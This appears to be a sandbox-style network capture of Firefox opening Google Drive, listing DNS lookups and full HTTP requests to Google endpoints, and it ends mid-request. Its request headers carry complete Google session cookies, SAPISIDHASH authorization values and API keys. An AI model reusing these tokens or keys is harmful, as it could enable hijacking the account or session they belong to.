cookie: SIDCC=AKEyXzWty86UPD0Qm497H9fAKW29z3wUXL28cmIDS6CwxfPI0ZQF-Zpz0S0tXS7ilPMlFLfA
cookie: __Secure-1PSIDCC=AKEyXzXKGknF3xxUS4XvKKWOXJvJYYqD-pZ1vlCaf6UF9Yz8oG_zjGFcT3n-eGd2mm981_FA
cookie: __Secure-3PSIDCC=AKEyXzXhIz_FZlL1suaek64VfGI0tZgBHbeV5vx2lNHsN0WbcbonM0t0B059QPAvEvt6nd82
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-site
te: trailers
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN A

Response

lh2.l.google.com

IN A

216.58.212.238
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN A

Response

lh2.l.google.com

IN A

216.58.212.238
DNS

ssl.gstatic.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.gstatic.com

IN AAAA

Response

ssl.gstatic.com

IN AAAA

2a00:1450:4009:822::2003
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN AAAA

Response

lh2.l.google.com

IN AAAA

2a00:1450:4009:80b::200e
DNS

lh2.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh2.l.google.com

IN AAAA

Response

lh2.l.google.com

IN AAAA

2a00:1450:4009:80b::200e
DNS

94.1.102.66.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

94.1.102.66.in-addr.arpa

IN PTR

Response

94.1.102.66.in-addr.arpa

IN PTR

wb-in-f941e100net
DNS

3.200.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

3.200.250.142.in-addr.arpa

IN PTR

Response

3.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f31e100net
DNS

238.212.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

238.212.58.216.in-addr.arpa

IN PTR

Response

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f141e100net

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f238�I

238.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f14�I
DNS

238.212.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

238.212.58.216.in-addr.arpa

IN PTR

Response

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f2381e100net

238.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f14�J

238.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f14�J
DNS

drive-thirdparty.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive-thirdparty.googleusercontent.com

IN A

Response

drive-thirdparty.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

drive-thirdparty.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive-thirdparty.googleusercontent.com

IN A

Response

drive-thirdparty.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients6.google.com

IN A

Response

clients6.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients6.google.com

IN A

Response

clients6.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
GET

https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=9d0tavq3v05s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.238:443

Request

GET /drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=9d0tavq3v05s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-ext-525001598-jspb: W1szMDEsMSxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxbMl1dXQ==
x-goog-drive-client-version: drive.web-frontend_20250106.13_p1
authorization: SAPISIDHASH 1736790062_49027dd9ed28a89c9705e0c7ce7175c8de27f727_u SAPISID1PHASH 1736790062_49027dd9ed28a89c9705e0c7ce7175c8de27f727_u SAPISID3PHASH 1736790062_49027dd9ed28a89c9705e0c7ce7175c8de27f727_u
x-goog-authuser: 0
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=cMDWyR80NQCYiVQb7fNJJiS4XwTHiQ331Yvv5tec4IZDivzWbDy4apTz82Ay4TKtrYx86woY6dS_rTaEaiqt3JEdzKgwqcUzh_9vb8Evc9r2nToT-adOxlehkUQzN0ZVoX2dtlH6lAKGbGEKWLTxXl6CKXb4ygyfqkKc2KGz5wppfs2lPdix5Rhk5_p2z0JP2n6xo2YIYgjR2UZ88cHW_glXDNeR6XKbLu1QAms3LRdgbpP1Ve5G0vzy-lNvgYuUoB5WbZrkTuhIMuB-odcKca4zeD0A8TbMzYr2zkiJ7rVrqsuG204l7--uyWEax7XCybNBdSBnYfbmSEbx7h1EJo03HZW5bU5_6SNxixGicO6wOrU0e4wmIBe28N0Z7-NpZlfNHwldBsOaRSwy8zTFVYEHnaFXRasBN6l-MQW6ov7odKbcu3f7LJpB7ZVMU77CNhNbbl32FlZLX0kbbotgXsl0uWjtdLJo8z2GNuZ8RJjqkG9A7kC_cJ794AKnWxGKZ_pLKQjhu0HSdNxsnVfXHP5Ci2UWSs6t6lnWFc_CrsPjS8f6SZsfiWKHQx80UQcQaUW0SdK8NqAhHEzBWZBzH6cIpz54_90hbchAXk76FLyxQ1CTSI6yD5HU4z3nWH6yM0iwJBu43DY-hQGKXrBZPocXrdIfWQQxUrMPON19wQEo2NZQtiAquaxlaw
cookie: __Secure-ENID=25.SE=h7YO1yotlX92QX9JAt8hz4oEqcI3GpTafLzBny-zN5I-NRvOCREBRvlqH_JP3vPMN9NBJN1pu4s17nFmRjW3HDz7GEZQaBVqC_yCoP1gxJlTzQyFdeTALw9RQVGljWrjlZsoXQ0UTX5quWtmvDoInlAt22k-DqN7uQhNWkjlE1nw02MmN2bja06Ub7EQayPG
cookie: SID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZjwSscZdBJ4lF3uOBFp_ZAwACgYKAW8SARQSFQHGX2MiZFNJP2ACEFqZISPSalVAhBoVAUF8yKopDDVvR1akTCIG9iuBa6W50076
cookie: __Secure-1PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZWW_-Oe5-4MHRg_wLc5VbtQACgYKAfkSARQSFQHGX2Mim965HNRO_ngfVJcrEWufqxoVAUF8yKpfgx1Nhvk90r3zqVQTV6_W0076
cookie: __Secure-3PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZZBnZ1dT24jvpejQzPExglwACgYKAZYSARQSFQHGX2Mi0NitG6JVf_k0IBHjzhmNcRoVAUF8yKqJdc1HCm7tD_S31re8hOUj0076
cookie: HSID=ABKAK0UlryVQbQxXV
cookie: SSID=A8GJw4gkjpjsZ9u9k
cookie: APISID=Uu7hdbbPpx8uTKMQ/APW3YmgTxn9MOUw7z
cookie: SAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-1PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-3PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: SIDCC=AKEyXzWty86UPD0Qm497H9fAKW29z3wUXL28cmIDS6CwxfPI0ZQF-Zpz0S0tXS7ilPMlFLfA
cookie: __Secure-1PSIDCC=AKEyXzXKGknF3xxUS4XvKKWOXJvJYYqD-pZ1vlCaf6UF9Yz8oG_zjGFcT3n-eGd2mm981_FA
cookie: __Secure-3PSIDCC=AKEyXzXhIz_FZlL1suaek64VfGI0tZgBHbeV5vx2lNHsN0WbcbonM0t0B059QPAvEvt6nd82
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=9d0tavq3v05s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.238:443

Request

OPTIONS /drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=9d0tavq3v05s&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: authorization,x-goog-authuser,x-goog-drive-client-version,x-goog-ext-525001598-jspb
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg

firefox.exe

Remote address:

142.250.187.238:443

Request

OPTIONS /drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg HTTP/2.0
host: clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: x-goog-drive-client-version
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

clients.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients.l.google.com

IN A

Response

clients.l.google.com

IN A

142.250.187.238
DNS

clients.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients.l.google.com

IN A

Response

clients.l.google.com

IN A

142.250.187.238
DNS

clients.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

clients.l.google.com

IN AAAA

Response

clients.l.google.com

IN AAAA

2a00:1450:4009:820::200e
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN A

Response

ogads-pa.clients6.google.com

IN A

142.250.187.234
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN A

Response

waa-pa.clients6.google.com

IN A

216.58.201.106
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN A

Response

waa-pa.clients6.google.com

IN A

216.58.201.106
POST

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

firefox.exe

Remote address:

142.250.187.234:443

Request

POST /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-api-key: AIzaSyCbsbvGCe7C9mCtdaTycZB2eUFuzsYKG_E
authorization: SAPISIDHASH 1736790062_d2753b23c0ad870320fcda0b425507f200886d82 SAPISID1PHASH 1736790062_d2753b23c0ad870320fcda0b425507f200886d82 SAPISID3PHASH 1736790062_d2753b23c0ad870320fcda0b425507f200886d82
x-goog-authuser: 0
content-type: application/json+protobuf
x-user-agent: grpc-web-javascript/0.1
content-length: 70
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=cMDWyR80NQCYiVQb7fNJJiS4XwTHiQ331Yvv5tec4IZDivzWbDy4apTz82Ay4TKtrYx86woY6dS_rTaEaiqt3JEdzKgwqcUzh_9vb8Evc9r2nToT-adOxlehkUQzN0ZVoX2dtlH6lAKGbGEKWLTxXl6CKXb4ygyfqkKc2KGz5wppfs2lPdix5Rhk5_p2z0JP2n6xo2YIYgjR2UZ88cHW_glXDNeR6XKbLu1QAms3LRdgbpP1Ve5G0vzy-lNvgYuUoB5WbZrkTuhIMuB-odcKca4zeD0A8TbMzYr2zkiJ7rVrqsuG204l7--uyWEax7XCybNBdSBnYfbmSEbx7h1EJo03HZW5bU5_6SNxixGicO6wOrU0e4wmIBe28N0Z7-NpZlfNHwldBsOaRSwy8zTFVYEHnaFXRasBN6l-MQW6ov7odKbcu3f7LJpB7ZVMU77CNhNbbl32FlZLX0kbbotgXsl0uWjtdLJo8z2GNuZ8RJjqkG9A7kC_cJ794AKnWxGKZ_pLKQjhu0HSdNxsnVfXHP5Ci2UWSs6t6lnWFc_CrsPjS8f6SZsfiWKHQx80UQcQaUW0SdK8NqAhHEzBWZBzH6cIpz54_90hbchAXk76FLyxQ1CTSI6yD5HU4z3nWH6yM0iwJBu43DY-hQGKXrBZPocXrdIfWQQxUrMPON19wQEo2NZQtiAquaxlaw
cookie: __Secure-ENID=25.SE=h7YO1yotlX92QX9JAt8hz4oEqcI3GpTafLzBny-zN5I-NRvOCREBRvlqH_JP3vPMN9NBJN1pu4s17nFmRjW3HDz7GEZQaBVqC_yCoP1gxJlTzQyFdeTALw9RQVGljWrjlZsoXQ0UTX5quWtmvDoInlAt22k-DqN7uQhNWkjlE1nw02MmN2bja06Ub7EQayPG
cookie: SID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZjwSscZdBJ4lF3uOBFp_ZAwACgYKAW8SARQSFQHGX2MiZFNJP2ACEFqZISPSalVAhBoVAUF8yKopDDVvR1akTCIG9iuBa6W50076
cookie: __Secure-1PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZWW_-Oe5-4MHRg_wLc5VbtQACgYKAfkSARQSFQHGX2Mim965HNRO_ngfVJcrEWufqxoVAUF8yKpfgx1Nhvk90r3zqVQTV6_W0076
cookie: __Secure-3PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZZBnZ1dT24jvpejQzPExglwACgYKAZYSARQSFQHGX2Mi0NitG6JVf_k0IBHjzhmNcRoVAUF8yKqJdc1HCm7tD_S31re8hOUj0076
cookie: HSID=ABKAK0UlryVQbQxXV
cookie: SSID=A8GJw4gkjpjsZ9u9k
cookie: APISID=Uu7hdbbPpx8uTKMQ/APW3YmgTxn9MOUw7z
cookie: SAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-1PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-3PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: SIDCC=AKEyXzWty86UPD0Qm497H9fAKW29z3wUXL28cmIDS6CwxfPI0ZQF-Zpz0S0tXS7ilPMlFLfA
cookie: __Secure-1PSIDCC=AKEyXzXKGknF3xxUS4XvKKWOXJvJYYqD-pZ1vlCaf6UF9Yz8oG_zjGFcT3n-eGd2mm981_FA
cookie: __Secure-3PSIDCC=AKEyXzXhIz_FZlL1suaek64VfGI0tZgBHbeV5vx2lNHsN0WbcbonM0t0B059QPAvEvt6nd82
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN A

Response

ogads-pa.clients6.google.com

IN A

142.250.180.10
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN A

Response

ogads-pa.clients6.google.com

IN A

142.250.187.234
POST

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

firefox.exe

Remote address:

216.58.201.106:443

Request

POST /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: waa-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-goog-api-key: AIzaSyBGb5fGAyC-pRcRU6MUHb__b_vKha71HRE
authorization: SAPISIDHASH 1736790062_d2753b23c0ad870320fcda0b425507f200886d82 SAPISID1PHASH 1736790062_d2753b23c0ad870320fcda0b425507f200886d82 SAPISID3PHASH 1736790062_d2753b23c0ad870320fcda0b425507f200886d82
x-goog-authuser: 0
content-type: application/json+protobuf
x-user-agent: grpc-web-javascript/0.1
content-length: 24
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=cMDWyR80NQCYiVQb7fNJJiS4XwTHiQ331Yvv5tec4IZDivzWbDy4apTz82Ay4TKtrYx86woY6dS_rTaEaiqt3JEdzKgwqcUzh_9vb8Evc9r2nToT-adOxlehkUQzN0ZVoX2dtlH6lAKGbGEKWLTxXl6CKXb4ygyfqkKc2KGz5wppfs2lPdix5Rhk5_p2z0JP2n6xo2YIYgjR2UZ88cHW_glXDNeR6XKbLu1QAms3LRdgbpP1Ve5G0vzy-lNvgYuUoB5WbZrkTuhIMuB-odcKca4zeD0A8TbMzYr2zkiJ7rVrqsuG204l7--uyWEax7XCybNBdSBnYfbmSEbx7h1EJo03HZW5bU5_6SNxixGicO6wOrU0e4wmIBe28N0Z7-NpZlfNHwldBsOaRSwy8zTFVYEHnaFXRasBN6l-MQW6ov7odKbcu3f7LJpB7ZVMU77CNhNbbl32FlZLX0kbbotgXsl0uWjtdLJo8z2GNuZ8RJjqkG9A7kC_cJ794AKnWxGKZ_pLKQjhu0HSdNxsnVfXHP5Ci2UWSs6t6lnWFc_CrsPjS8f6SZsfiWKHQx80UQcQaUW0SdK8NqAhHEzBWZBzH6cIpz54_90hbchAXk76FLyxQ1CTSI6yD5HU4z3nWH6yM0iwJBu43DY-hQGKXrBZPocXrdIfWQQxUrMPON19wQEo2NZQtiAquaxlaw
cookie: __Secure-ENID=25.SE=h7YO1yotlX92QX9JAt8hz4oEqcI3GpTafLzBny-zN5I-NRvOCREBRvlqH_JP3vPMN9NBJN1pu4s17nFmRjW3HDz7GEZQaBVqC_yCoP1gxJlTzQyFdeTALw9RQVGljWrjlZsoXQ0UTX5quWtmvDoInlAt22k-DqN7uQhNWkjlE1nw02MmN2bja06Ub7EQayPG
cookie: SID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZjwSscZdBJ4lF3uOBFp_ZAwACgYKAW8SARQSFQHGX2MiZFNJP2ACEFqZISPSalVAhBoVAUF8yKopDDVvR1akTCIG9iuBa6W50076
cookie: __Secure-1PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZWW_-Oe5-4MHRg_wLc5VbtQACgYKAfkSARQSFQHGX2Mim965HNRO_ngfVJcrEWufqxoVAUF8yKpfgx1Nhvk90r3zqVQTV6_W0076
cookie: __Secure-3PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZZBnZ1dT24jvpejQzPExglwACgYKAZYSARQSFQHGX2Mi0NitG6JVf_k0IBHjzhmNcRoVAUF8yKqJdc1HCm7tD_S31re8hOUj0076
cookie: HSID=ABKAK0UlryVQbQxXV
cookie: SSID=A8GJw4gkjpjsZ9u9k
cookie: APISID=Uu7hdbbPpx8uTKMQ/APW3YmgTxn9MOUw7z
cookie: SAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-1PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-3PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: SIDCC=AKEyXzWty86UPD0Qm497H9fAKW29z3wUXL28cmIDS6CwxfPI0ZQF-Zpz0S0tXS7ilPMlFLfA
cookie: __Secure-1PSIDCC=AKEyXzXKGknF3xxUS4XvKKWOXJvJYYqD-pZ1vlCaf6UF9Yz8oG_zjGFcT3n-eGd2mm981_FA
cookie: __Secure-3PSIDCC=AKEyXzXhIz_FZlL1suaek64VfGI0tZgBHbeV5vx2lNHsN0WbcbonM0t0B059QPAvEvt6nd82
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

firefox.exe

Remote address:

216.58.201.106:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: waa-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping

firefox.exe

Remote address:

216.58.201.106:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Ping HTTP/2.0
host: waa-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN A

Response

waa-pa.clients6.google.com

IN A

142.250.180.10
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN A

Response

waa-pa.clients6.google.com

IN A

172.217.169.42
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN AAAA

Response

ogads-pa.clients6.google.com

IN AAAA

2a00:1450:4009:823::200a
DNS

ogads-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN AAAA

Response

ogads-pa.clients6.google.com

IN AAAA

2a00:1450:4009:823::200a
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN AAAA

Response

waa-pa.clients6.google.com

IN AAAA

2a00:1450:4009:81f::200a
DNS

waa-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN AAAA

Response

waa-pa.clients6.google.com

IN AAAA

2a00:1450:4009:819::200a
OPTIONS

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

firefox.exe

Remote address:

142.250.187.234:443

Request

OPTIONS /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

234.187.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

234.187.250.142.in-addr.arpa

IN PTR

Response

234.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f101e100net
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN A

Response

drivefrontend-pa.clients6.google.com

IN A

216.58.204.74
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN AAAA

Response

drivefrontend-pa.clients6.google.com

IN AAAA

2a00:1450:4009:820::200a
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN A

Response

people-pa.clients6.google.com

IN A

216.58.213.10
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN A

Response

people-pa.clients6.google.com

IN A

142.250.180.10
POST

https://people-pa.clients6.google.com/batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Du165d8aakbdu%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

216.58.213.10:443

Request

